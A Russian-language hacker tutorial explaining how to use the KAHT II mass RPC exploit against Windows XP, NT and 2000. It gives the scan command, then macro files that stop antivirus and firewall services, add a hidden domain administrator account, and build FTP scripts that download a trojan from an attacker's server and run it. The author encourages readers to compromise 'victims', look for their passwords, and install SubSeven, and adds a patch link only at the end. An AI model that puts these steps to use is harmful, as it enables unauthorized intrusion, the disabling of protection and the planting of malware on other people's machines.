Используем KAHT II - MASSIVE RPC EXPLOIT 

     Некоторое  время  назад на многих сайтах посвященных security появилась информация о уязвимости найденной в
     RPC.  Уязвимости  оказались  подвержены  winXP,  NT, 2000. Сначала для этой баги был выложен сплоит который
     просто  перезагружал машину, позднее стали появляться эксплоиты которые давали командную строку на уязвимой
     машине.  Ну  и  конечно  не  обошлось без червя который юзает эту багу для распространения =) На червяке мы
     останавливаться  не  будем  т.к.  это  для  нас  не  особо  интересно (во всяком случае для меня) а немного
     разберемся  с  одним  из представителей веселой братии прог-сплоитов дающем командную строку. Итак на сцене
     KAHTII  =)  Чем  же  он так примечателен? Во-первых как следует из названия "KAHT II - MASSIVE RPC EXPLOIT"
     этот  сплоит  может  сканировать диапазон адресов на наличие уязвимости (удобно правда?) Во-вторых он может
     юзаться  под  виндой  (script  kiddies  ликуют)  В-третьих  в нем реализована офигительная фишка называемая
     "macros" ака макросы... ну на этом мы остановимся чуть позднее.
     Итак  что  нам  надо для начала? ПИВА!!! - крики из зала.... Мммм пиво конечно нужно, но для начала надо бы
     скачать  сам  сплоит.  Значит бегом на securitylab.ru (например) ищем либо по названию, либо файл kaht2.zip
     качаем... разархивируем. Имеем в каталоге в который развернули архив следующие файлы:
     kaHt2.exe - собсна прога с которой нам придется иметь дело
     kaHt2.c - енто будет вам нужно лишь в случае если вы *nix-like юзер
     macros.txt - файлик с макросами
     Ну что начнем? Запускаем командную строку.
     Набираем там следующую хрень:
     kaHt2.exe 111.111.111.1 111.111.111.111
     где 111.111.111.1 и 111.111.111.111 соответственно диапазон адресов для сканирования.
     И запускаем.... let's start a war как говорится....
     Вдоволь  насканившись  при  удачном  результате  если  среди  просканеных  компов есть уязвимые вы получите
     командную строку на удаленной тачке. Забегая вперед скажу что после того как закончите мучить первую жертву
     жмите ctrl+z и сплоит перекинет вас на следующую багнутую машину, все для удобства пользователя блин.
     Ну чтож мы внутри... осмотримся... команды надеюсь вы знаете.
     Можно искать номера асек, пароли... ну сами не маленькие.
     Теперь  будем делать свое пребывание на тачке более комфортным. Тут то нам и пригодятся макросы о которых я
     говорил выше. Открывайте файл macros.txt щас мы с вами будем творить...
     Уххх как много интересного =)
     Например это:
     [Macro]
     name=kill_avs
     key=!1
     delay=500
     cmd=net stop Mcshield
     cmd=net stop "Norton Antivirus Service"
     cmd=net stop "Panda Antivirus"
     cmd=net stop "ZoneAlarm"
     cmd=net stop "Detector de OfficeScanNT"
     cmd=net stop "McAfee Framework Service"

     Знаете  что  это?  Нет???  Ну ладно щас расскажу. Когда вы юзаете командную строку на удаленной тачке через
     сплоит  наберите  !1  и  сплоит  закроет  фаеры  и антивири. Соответственно вы сами можете дополнить список
     команд. Синтаксис прост: cmd=команда_для_выполнения

     Или вот ещё:

     [Macro]
     name=Adduser
     key=!5
     delay=500
     cmd=net user SUPPORT_3569a74r KaHTSecuritycheck/add
     cmd=net localgroup Administradores SUPPORT_3569a74r /add
     cmd=net localgroup Administrators SUPPORT_3569a74r /add
     cmd=net group "Domain Admins" SUPPORT_3569a74r /add

     Набрав !5 вы добавите пользователя на тачке.

     Все это безусловно интересно но давай-те передем к практике. Будем заливать файло на комп жертвы. Для этого
     будем писать свой макрос. Поехали. Пишем в файл.

     [Macro]
     name=upload
     key=!2
     delay=500
     cmd=echo open hack.ru 21>a
     cmd=echo hacker>>a
     cmd=echo password>>a
     cmd=echo get read.txt>>a
     cmd=echo bye>>a
     cmd=start ftp -s:a

     Итак рассмотрим более подробно.
     cmd=echo open hack.ru 21>a - пишем в файл a 'echo open hacksite.ru 21' т.е. коннектимся к сайту hack.ru
     cmd=echo hacker>>a - логин hacker
     cmd=echo password>>a - пароль password
     cmd=echo get read.txt>>a - получить файл read.txt
     cmd=echo bye>>a - до свиданья... =)
     cmd=start ftp -s:a - открываем фтп и передаем ему в кач-ве команд текст из файла a

     Теперь  испробуем.  В  командной  строке  набираем  !2  и после выполнения макроса получаем в каталоге файл
     read.txt скачанный с нашего сайта...

     Ну  как?  Идеи  появились? Что нет? Ну вы блин даете =) Лана... лана... файл read.txt это конечно нереально
     круто но может все таки закинем ламаку троян? Аааа... вижу как глазки загорелись.
     Следующий макрос:

     [Macro]
     name=Upload_Supa_Trojan
     key=!3
     delay=500
     cmd=echo open hacksite.ru 21>a
     cmd=echo hacker>>a
     cmd=echo password>>a
     cmd=echo get troj.exe>>a
     cmd=echo bye>>a
     cmd=start ftp -s:a
     delay=15000

     Тут все тоже самое только получаем файл troj.exe Надеюсь вы догадаетеcь заранее залить его на ваш сервак =)
     Жмем !3
     После выполнения этого макроса в каталоге появится файлик троя. Теперь нам осталось его только запустить.
     Набиваем: start troj.exe

     Всё. Ещё одной протрояненой тачкой в инете стало больше.
     Кстати. SubSeven - best troy in net =)))) IMHO.

     Вот  такие калачи. Если вы не хотите пополнить ряды людей которых поимели с помощью данного сплоита качайте
     заплатку.
     Вот тут патч для русской ХРени :
     http://download.microsoft.com/download/7/0/f/70f4eb2a-a663-4292-8ce7-581b1715bb51/WindowsXP-KB823980-x86-RUS.exe
     Для других систем без труда найдете сами =)
     (например в нашей рассылке)


     cya....




     Автор: 1dt.w0lf
     ---------------------------------------
     RusH security team - http://rst.void.ru